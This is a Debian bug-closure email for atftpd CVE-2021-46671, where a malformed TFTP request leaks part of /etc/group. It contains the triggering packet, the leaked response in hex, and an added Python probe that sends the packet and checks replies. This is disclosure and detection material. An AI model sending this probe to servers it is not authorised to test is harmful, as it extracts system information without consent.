Your message dated Sun, 13 Feb 2022 22:03:23 +0000
with message-id <e1njmxn-000ews...@fasolo.debian.org>
and subject line Bug#1004974: fixed in atftp 0.7.git20120829-3.2~deb10u3
has caused the Debian Bug report #1004974,
regarding atftpd: CVE-2021-46671: Potential information leak in atftpd<0.7.5
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1004974: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004974
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: atftpd
Version: 0.7.git20120829-3.3+deb11u1
Severity: grave
Tags: security
Justification: user security hole
X-Debbugs-Cc: debian_f7b...@jkrupp.de, Debian Security Team <t...@security.debian.org>

Dear Maintainer,

   * What led up to the situation?
During a research project we have found a potential information leak in the 
atftpd daemon from package atftpd, where malformed requests can lead to a 
(partial) leak of the contents of /etc/group.

   * What exactly did you do (or not do) that was effective (or
     ineffective)?
Sent the following (malformed) packet:
```
00000000: 0001 006e 6574 6173 6369 6900 7473 697a  ...netascii.tsiz
00000010: 6500 78                                  e.x
```

   * What was the outcome of this action?
A freshly started atftpd server replies with a packet containing contents of 
/etc/group
```
00000000: 0006 7473 697a 6500 7831 3a0a 6269 6e3a  ..tsize.x1:.bin:
00000010: 783a 323a 0a73 7973 3a78 3a33 3a0a 6164  x:2:.sys:x:3:.ad
00000020: 6d3a 783a 343a 0a74 7479 3a78 3a35 3a0a  m:x:4:.tty:x:5:.
00000030: 6469 736b 3a78 3a36 3a0a 6c70 3a78 3a37  disk:x:6:.lp:x:7
00000040: 3a0a 6d61 696c 3a78 3a38 3a0a 6e65 7773  :.mail:x:8:.news
00000050: 3a78 3a39 3a0a 7575 6370 3a78 3a31 303a  :x:9:.uucp:x:10:
00000060: 0a6d 616e 3a78 3a31 323a 0a70 726f 7879  .man:x:12:.proxy
00000070: 3a78 3a31 333a 0a6b 6d65 6d3a 783a 3135  :x:13:.kmem:x:15
00000080: 3a0a 6469 616c 6f75 743a 783a 3230 3a0a  :.dialout:x:20:.
00000090: 6661 783a 783a 3231 3a0a 766f 6963 653a  fax:x:21:.voice:
000000a0: 783a 3232 3a0a 6364 726f 6d3a 783a 3234  x:22:.cdrom:x:24
000000b0: 3a0a 666c 6f70 7079 3a78 3a32 353a 0a74  :.floppy:x:25:.t
000000c0: 6170 653a 783a 3236 3a0a 7375 646f 3a78  ape:x:26:.sudo:x
000000d0: 3a32 373a 0a61 7564 696f 3a78 3a32 393a  :27:.audio:x:29:
000000e0: 0a64 6970 3a78 3a33 303a 0a77 7777 2d64  .dip:x:30:.www-d
000000f0: 6174 613a 783a 3333 3a0a 6261 636b 7570  ata:x:33:.backup
00000100: 3a78 3a33 343a 0a00                      :x:34:..
```

   * What outcome did you expect instead?
No response or an error message from the server.

It appears that this bug has been fixed upstream (commit
9cf799c40738722001552618518279e9f0ef62e5), and the fix is already
included in atftpd version 0.7.git20210915-3 in debian testing.
Yet we were able to reproduce this behavior on debian stable/bullseye 
(atftpd version 0.7.git20120829-3.3+deb11u1) and debian oldstable/buster 
(atftpd version 0.7.git20120829-3.2~deb10u2).

Further, the issue appears to only occur when running atftpd in
standalone mode (--daemon, not via inetd), and only on the very first
request, as the buffer containing /etc/group data is overwritten by the
new request.

-- System Information:
Debian Release: 11.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-9-amd64 (SMP w/1 CPU thread)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages atftpd depends on:
ii  debconf [debconf-2.0]  1.5.77
ii  libc6                  2.31-13+deb11u2
ii  libpcre3               2:8.39-13
ii  libwrap0               7.6.q-31
ii  lsb-base               11.1.0
ii  tcpd                   7.6.q-31
ii  update-inetd           4.51

Versions of packages atftpd recommends:
ii  rlinetd [inet-superserver]  0.9.3-1

Versions of packages atftpd suggests:
ii  logrotate  3.18.0-2

-- debconf information:
  atftpd/mcast_addr: 239.239.239.0-255
  atftpd/multicast: true
  atftpd/logfile: /var/log/atftpd.log
  atftpd/maxthread: 100
  atftpd/tftpd-timeout: 300
  atftpd/logtofile: false
  atftpd/tsize: true
  atftpd/ttl: 1
  atftpd/basedir: /srv/tftp
  atftpd/blksize: true
  atftpd/verbosity: 5 (LOG_NOTICE)
  atftpd/port: 69
  atftpd/mcast_port: 1758
  atftpd/use_inetd: true
  atftpd/retry-timeout: 5
  atftpd/timeout: true

--- End Message ---
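The request/response pair from the report above, turned into a small probe. This is an added example, not code from the bug report or from the atftp project: it rebuilds the 19-byte malformed RRQ byte-for-byte (empty filename, mode netascii, option tsize with the value "x" deliberately left without its NUL terminator), parses whatever the server answers as an RFC 2347 OACK, and classifies the reply. A tsize value that is not a plain decimal number is treated as a leak, since a well-behaved server can only answer tsize with a file size or reject the request with a TFTP ERROR. The function names, the verdict strings and the `probe()` helper are this example's own; the sample OACK is transcribed from the hex dump in the report.

```python
"""Probe a TFTP server for the tsize option leak described in Debian #1004974."""
import socket
import struct

OP_RRQ, OP_DATA, OP_ERROR, OP_OACK = 1, 3, 5, 6


def build_probe() -> bytes:
    # RRQ: opcode 1, empty filename, mode "netascii", then the option "tsize"
    # whose value "x" is deliberately left without its NUL terminator.
    # This is byte-for-byte the 19-byte packet shown in the report.
    return struct.pack("!H", OP_RRQ) + b"\x00" + b"netascii\x00" + b"tsize\x00" + b"x"


def parse_oack(data: bytes) -> dict:
    """Split an OACK (RFC 2347) into {option: value}; raise ValueError otherwise."""
    if len(data) < 2 or struct.unpack("!H", data[:2])[0] != OP_OACK:
        raise ValueError("not an OACK")
    fields = data[2:].split(b"\x00")
    if fields and fields[-1] == b"":
        fields.pop()  # the final NUL produces one empty trailing element
    if len(fields) % 2:
        raise ValueError("odd number of NUL-separated fields in OACK")
    return dict(zip(fields[0::2], fields[1::2]))


def assess_response(data: bytes) -> tuple:
    """Classify a reply to build_probe().

    Returns (verdict, payload) with verdict one of:
      "error" - TFTP ERROR packet (the safe reaction the reporter expected)
      "clean" - OACK whose tsize value is a plain decimal number
      "leak"  - OACK whose tsize value carries non-numeric bytes, i.e. the
                server echoed back something that is not a file size
      "other" - DATA packet, malformed reply, or OACK without tsize
    """
    if len(data) < 2:
        return "other", data
    opcode = struct.unpack("!H", data[:2])[0]
    if opcode == OP_ERROR:
        return "error", data[4:].split(b"\x00", 1)[0]  # ErrMsg after ErrorCode
    if opcode != OP_OACK:
        return "other", data
    try:
        tsize = parse_oack(data).get(b"tsize")
    except ValueError:
        return "other", data
    if not tsize:
        return "other", data
    if tsize.isdigit():
        return "clean", tsize
    return "leak", tsize


def probe(host: str, port: int = 69, timeout: float = 2.0):
    """Send the probe once and classify the answer; None if the server stays silent."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_probe(), (host, port))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return None
    return assess_response(data)


# The OACK from the report, transcribed from its hex dump (not captured here).
REPORTED_OACK = bytes.fromhex(
    "0006 7473 697a 6500 7831 3a0a 6269 6e3a"
    "783a 323a 0a73 7973 3a78 3a33 3a0a 6164"
    "6d3a 783a 343a 0a74 7479 3a78 3a35 3a0a"
    "6469 736b 3a78 3a36 3a0a 6c70 3a78 3a37"
    "3a0a 6d61 696c 3a78 3a38 3a0a 6e65 7773"
    "3a78 3a39 3a0a 7575 6370 3a78 3a31 303a"
    "0a6d 616e 3a78 3a31 323a 0a70 726f 7879"
    "3a78 3a31 333a 0a6b 6d65 6d3a 783a 3135"
    "3a0a 6469 616c 6f75 743a 783a 3230 3a0a"
    "6661 783a 783a 3231 3a0a 766f 6963 653a"
    "783a 3232 3a0a 6364 726f 6d3a 783a 3234"
    "3a0a 666c 6f70 7079 3a78 3a32 353a 0a74"
    "6170 653a 783a 3236 3a0a 7375 646f 3a78"
    "3a32 373a 0a61 7564 696f 3a78 3a32 393a"
    "0a64 6970 3a78 3a33 303a 0a77 7777 2d64"
    "6174 613a 783a 3333 3a0a 6261 636b 7570"
    "3a78 3a33 343a 0a00"
)

if __name__ == "__main__":
    verdict, payload = assess_response(REPORTED_OACK)
    print(verdict, payload[:32])
```

Two caveats follow directly from the report when using this against a live server: the leak is only visible in standalone mode (--daemon) and only on the very first request after the daemon starts, so a "clean" verdict from a server that has already handled traffic proves nothing, and the leaked tsize value begins with the probe's own "x" before the stale buffer contents start.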
--- Begin Message ---
Source: atftp
Source-Version: 0.7.git20120829-3.2~deb10u3
Done: Andreas B. Mundt <a...@debian.org>

We believe that the bug you reported is fixed in the latest version of
atftp, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1004...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andreas B. Mundt <a...@debian.org> (supplier of updated atftp package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Fri, 04 Feb 2022 18:47:25 +0100
Source: atftp
Architecture: source
Version: 0.7.git20120829-3.2~deb10u3
Distribution: buster
Urgency: medium
Maintainer: Ludovic Drolez <ldro...@debian.org>
Changed-By: Andreas B. Mundt <a...@debian.org>
Closes: 1004974
Changes:
 atftp (0.7.git20120829-3.2~deb10u3) buster; urgency=medium
 .
   * Fix for CVE-2021-46671 (Closes: #1004974)
Checksums-Sha1:
 911be4d5386038d61120ab61741847453038ade5 1832 atftp_0.7.git20120829-3.2~deb10u3.dsc
 1824126b0e89fa3bcb86dc331baa3ae1b5b0b414 39475 atftp_0.7.git20120829-3.2~deb10u3.diff.gz
 6d1900ba8262a0eda9383f0e164f869e279b0f03 6501 atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo
Checksums-Sha256:
 cdfbf2015da904055ae84306e710da7aeb911abf52b4ed608571b0dd04d408b8 1832 atftp_0.7.git20120829-3.2~deb10u3.dsc
 50d892bc97d6d6ac55988bfb7d3fb8b7017bb686cc551deea1a9ee172035ab06 39475 atftp_0.7.git20120829-3.2~deb10u3.diff.gz
 31f65ba6c09d6f2d9283141be7d698cb8e11fb93dd24d6b938c9cd8e3e9bcf03 6501 atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo
Files:
 2da0f1b1839182324a1c154d3f8ffa24 1832 net extra atftp_0.7.git20120829-3.2~deb10u3.dsc
 5dd07e53cc45fcd31cc291a952e3e26f 39475 net extra atftp_0.7.git20120829-3.2~deb10u3.diff.gz
 163b23f0ce93746bbd35400f4ed9c4e0 6501 net extra atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---